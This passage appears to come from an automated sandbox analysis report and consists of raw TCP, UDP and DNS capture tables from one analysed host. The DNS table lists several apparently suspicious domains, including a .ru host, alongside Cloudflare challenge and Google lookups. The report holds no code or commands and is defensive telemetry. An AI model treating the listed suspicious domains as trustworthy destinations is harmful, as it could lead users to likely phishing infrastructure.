                                                                                                        Oct 4, 2024 15:11:49.398222923 CEST44352656104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.398566008 CEST44352656104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.398869991 CEST52656443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:49.398936987 CEST44352656104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.399008036 CEST52656443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:49.439404964 CEST44352656104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.498217106 CEST44352657188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.498549938 CEST52657443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.498564959 CEST44352657188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.499598026 CEST44352657188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.499826908 CEST52657443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.499984026 CEST52657443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.499984026 CEST52657443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.500041008 CEST44352657188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.500070095 CEST52657443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.500118971 CEST52657443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.500380993 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.500412941 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.500504017 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.500868082 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.500878096 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.553996086 CEST44352656104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.554088116 CEST44352656104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.554187059 CEST52656443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:49.554898977 CEST52656443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:49.554919004 CEST44352656104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.962893009 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.963268995 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.963289976 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.964298010 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.964387894 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.965817928 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:49.965873957 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.965934038 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:50.011406898 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:50.013807058 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:50.013822079 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:50.061670065 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:50.962919950 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:50.963026047 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:50.963074923 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:50.965706110 CEST52658443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:50.965723991 CEST44352658188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.026161909 CEST52659443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.026191950 CEST44352659104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.026252985 CEST52659443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.027483940 CEST52660443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.027523041 CEST44352660104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.027703047 CEST52659443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.027714968 CEST44352659104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.029107094 CEST52660443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.033114910 CEST52660443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.033138037 CEST44352660104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.125106096 CEST52661443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.125153065 CEST44352661188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.125224113 CEST52661443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.125572920 CEST52661443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.125585079 CEST44352661188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.594540119 CEST44352659104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.594834089 CEST52659443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.594851017 CEST44352659104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.595892906 CEST44352659104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.595962048 CEST52659443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.596877098 CEST52659443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.596945047 CEST44352659104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.597052097 CEST52659443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.597059011 CEST44352659104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.606064081 CEST44352661188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.606455088 CEST52661443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.606468916 CEST44352661188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.607919931 CEST44352661188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.608124971 CEST52661443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.608263016 CEST52661443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.608295918 CEST52661443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.608352900 CEST52661443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.608447075 CEST44352661188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.608496904 CEST52661443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.608684063 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.608707905 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.608824968 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.609116077 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:51.609126091 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.634227991 CEST44352660104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.634468079 CEST52660443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.634495020 CEST44352660104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.635561943 CEST44352660104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.635622025 CEST52660443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.635917902 CEST52660443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.635974884 CEST44352660104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.649499893 CEST52659443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.681519985 CEST52660443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.681550980 CEST44352660104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.729516983 CEST52660443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.730168104 CEST44352659104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.730256081 CEST44352659104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.730305910 CEST52659443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.732166052 CEST52659443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:11:51.732184887 CEST44352659104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:11:52.104151964 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:52.104432106 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:52.104449034 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:52.105519056 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:52.105645895 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:52.105921030 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:52.105998993 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:52.106036901 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:52.151401043 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:52.161956072 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:52.161978960 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:52.210457087 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:53.103308916 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:53.103429079 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:53.103503942 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:53.104242086 CEST52662443192.168.2.16188.114.96.3
                                                                                                        Oct 4, 2024 15:11:53.104263067 CEST44352662188.114.96.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:54.245740891 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:54.245769024 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:54.245851040 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:54.246287107 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:54.246300936 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:54.839958906 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:54.840131998 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:54.844933987 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:54.844943047 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:54.845206022 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:54.853965044 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:54.899404049 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:55.046010017 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:55.046030998 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:55.046045065 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:55.046144009 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:55.046171904 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:55.046227932 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:55.048377037 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:55.048417091 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:55.048459053 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:55.048476934 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:55.048490047 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:55.048535109 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:55.048573017 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:55.052520037 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:55.052542925 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:11:55.052557945 CEST52664443192.168.2.1620.12.23.50
                                                                                                        Oct 4, 2024 15:11:55.052563906 CEST4435266420.12.23.50192.168.2.16
                                                                                                        Oct 4, 2024 15:12:01.251049995 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:01.251091957 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:01.251180887 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:01.251422882 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:01.251434088 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.065341949 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.065676928 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:02.082421064 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:02.082454920 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.082794905 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.083285093 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:02.083312988 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:02.083324909 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.390247107 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.390264034 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.390305996 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.390360117 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.390378952 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:02.390796900 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:02.390796900 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:02.390796900 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:02.393143892 CEST52665443192.168.2.1620.190.159.75
                                                                                                        Oct 4, 2024 15:12:02.393156052 CEST4435266520.190.159.75192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.481271982 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:02.481303930 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:02.481379032 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:02.483441114 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:02.483450890 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:03.137371063 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:03.137505054 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:03.145762920 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:03.145792007 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:03.146150112 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:03.146369934 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:03.148456097 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:03.148546934 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:03.447482109 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:03.447627068 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:03.447660923 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:03.447695971 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:03.447768927 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:03.447861910 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:03.447921991 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:03.450982094 CEST52666443192.168.2.162.23.209.161
                                                                                                        Oct 4, 2024 15:12:03.451013088 CEST443526662.23.209.161192.168.2.16
                                                                                                        Oct 4, 2024 15:12:06.426760912 CEST44352660104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:12:06.426856995 CEST44352660104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:12:06.427001953 CEST52660443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:12:08.340615988 CEST52660443192.168.2.16104.17.202.204
                                                                                                        Oct 4, 2024 15:12:08.340648890 CEST44352660104.17.202.204192.168.2.16
                                                                                                        Oct 4, 2024 15:12:20.903359890 CEST52670443192.168.2.16142.250.186.164
                                                                                                        Oct 4, 2024 15:12:20.903417110 CEST44352670142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:12:20.903549910 CEST52670443192.168.2.16142.250.186.164
                                                                                                        Oct 4, 2024 15:12:20.903899908 CEST52670443192.168.2.16142.250.186.164
                                                                                                        Oct 4, 2024 15:12:20.903923035 CEST44352670142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:12:21.562661886 CEST44352670142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:12:21.563262939 CEST52670443192.168.2.16142.250.186.164
                                                                                                        Oct 4, 2024 15:12:21.563286066 CEST44352670142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:12:21.564466953 CEST44352670142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:12:21.564826012 CEST52670443192.168.2.16142.250.186.164
                                                                                                        Oct 4, 2024 15:12:21.564997911 CEST44352670142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:12:21.609708071 CEST52670443192.168.2.16142.250.186.164
                                                                                                        Oct 4, 2024 15:12:31.464451075 CEST44352670142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:12:31.464517117 CEST44352670142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:12:31.464643955 CEST52670443192.168.2.16142.250.186.164
                                                                                                        Oct 4, 2024 15:12:32.336031914 CEST52670443192.168.2.16142.250.186.164
                                                                                                        Oct 4, 2024 15:12:32.336056948 CEST44352670142.250.186.164192.168.2.16
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 4, 2024 15:11:16.025795937 CEST5405653192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:16.025955915 CEST53631411.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:16.026264906 CEST5638453192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:16.043500900 CEST53616741.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:16.061959982 CEST53563841.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:16.087528944 CEST53540561.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:17.033006907 CEST53527751.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:17.378916979 CEST5804053192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:17.379070997 CEST5842453192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:17.572088957 CEST53584241.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:17.572547913 CEST53580401.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:20.837698936 CEST6465753192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:20.837934971 CEST5854353192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:20.838627100 CEST5365253192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:20.838859081 CEST6543753192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:20.850347042 CEST53646571.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:20.850364923 CEST53585431.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:20.850378990 CEST53536521.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:20.850398064 CEST53654371.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.161935091 CEST5709253192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:22.162223101 CEST6249953192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:22.169687986 CEST53624991.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.170013905 CEST53570921.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.180932045 CEST6375353192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:22.182317972 CEST5542153192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:22.187756062 CEST53637531.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:22.188976049 CEST53554211.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.837009907 CEST5436953192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:34.017918110 CEST53558811.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:35.818746090 CEST6180653192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:35.818973064 CEST6316353192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:36.085695982 CEST53618061.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.130331039 CEST53631631.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.069406033 CEST53511991.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.157902002 CEST5926853192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.158060074 CEST5092953192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.158725023 CEST5690853192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.158860922 CEST6280653192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.159116030 CEST5022153192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.159238100 CEST5839353192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.165224075 CEST53509291.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.165236950 CEST53592681.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.165790081 CEST53628061.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.165851116 CEST53502211.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.166359901 CEST53583931.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.166619062 CEST53569081.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.870659113 CEST6285353192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.870852947 CEST5890353192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.879091024 CEST53589031.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.879110098 CEST53628531.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.930496931 CEST5169253192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.930651903 CEST5830953192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:38.937743902 CEST53583091.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.940103054 CEST53516921.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.560003042 CEST5327653192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:39.560148001 CEST6170853192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:39.566920996 CEST53532761.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:39.567429066 CEST53617081.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:41.238523006 CEST5930253192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:41.238686085 CEST5032253192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:41.245486975 CEST53593021.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:41.245675087 CEST53503221.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:48.825118065 CEST5756753192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:48.825253963 CEST5137253192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:48.951996088 CEST53513721.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:49.017318010 CEST53575671.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.006831884 CEST5153053192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:51.007004023 CEST5689153192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:51.024204016 CEST53515301.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.024724960 CEST53568911.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.029417992 CEST5866753192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:51.031964064 CEST6205653192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:51.121246099 CEST53586671.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.124228001 CEST53620561.1.1.1192.168.2.16
                                                                                                        Oct 4, 2024 15:11:51.732795000 CEST6122553192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:51.732969046 CEST5840953192.168.2.161.1.1.1
                                                                                                        Oct 4, 2024 15:11:59.032108068 CEST138138192.168.2.16192.168.2.255
                                                                                                        Oct 4, 2024 15:12:15.999119997 CEST53633561.1.1.1192.168.2.16
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Oct 4, 2024 15:11:16.025795937 CEST192.168.2.161.1.1.10x32a7Standard query (0)dtnyxe.member365.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:16.026264906 CEST192.168.2.161.1.1.10xf8aeStandard query (0)dtnyxe.member365.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:17.378916979 CEST192.168.2.161.1.1.10x2125Standard query (0)hollandco.athrikasih.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:17.379070997 CEST192.168.2.161.1.1.10x2c53Standard query (0)hollandco.athrikasih.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:20.837698936 CEST192.168.2.161.1.1.10x3c3bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:20.837934971 CEST192.168.2.161.1.1.10x9d62Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:20.838627100 CEST192.168.2.161.1.1.10x222aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:20.838859081 CEST192.168.2.161.1.1.10xf94dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:22.161935091 CEST192.168.2.161.1.1.10x30bbStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:22.162223101 CEST192.168.2.161.1.1.10xb4b4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:22.180932045 CEST192.168.2.161.1.1.10xf955Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:22.182317972 CEST192.168.2.161.1.1.10xf948Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:23.837009907 CEST192.168.2.161.1.1.10x3059Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:35.818746090 CEST192.168.2.161.1.1.10xa8fStandard query (0)9wetjda.niavereinho.ruA (IP address)IN (0x0001)false
